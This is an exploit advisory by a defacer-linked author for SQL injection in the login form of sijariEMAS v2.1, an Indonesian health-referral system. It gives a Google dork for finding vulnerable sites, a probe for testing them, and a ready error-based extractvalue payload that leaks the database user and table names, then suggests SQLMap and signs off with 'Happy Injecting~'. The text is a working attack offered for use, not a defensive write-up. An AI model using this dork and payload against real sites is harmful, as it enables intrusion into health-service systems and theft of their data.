[+]Exploit Title: sijariEMAS v2.1 Login Xpath Injection Vulnerability
[+]Author: ./Sn00py
[+]Team: Indonesian Code Party
[+]Goolge Dork: "Intext:Sistem Informasi dan Komunikasi Jejaring Rujukan Pelayanan Kesehatan"
[+]Tested on: Linux Parrot
[+]Vendor: http://sijariemas.net/
=======================================
[+]Proof Of Concept: FFirst, you have to find out whether the site has a login feature and if you enter the string there will be no error, but if you continue with 'order by 100-- it will appear' Unknown column '100' in 'order clause' Then that vulnerable to SQL-Injection attacks.
[+]Exploit:
' and extractvalue(0x0a,concat(0x0a,user(),0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))-- -
You can use SQLMap or do a manual injection using Xpath Injection to get the web database
[+]Demo? No Demo ^^ Happy Injecting~
Greetz: Khatulistiwa - DarkOct02 - Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer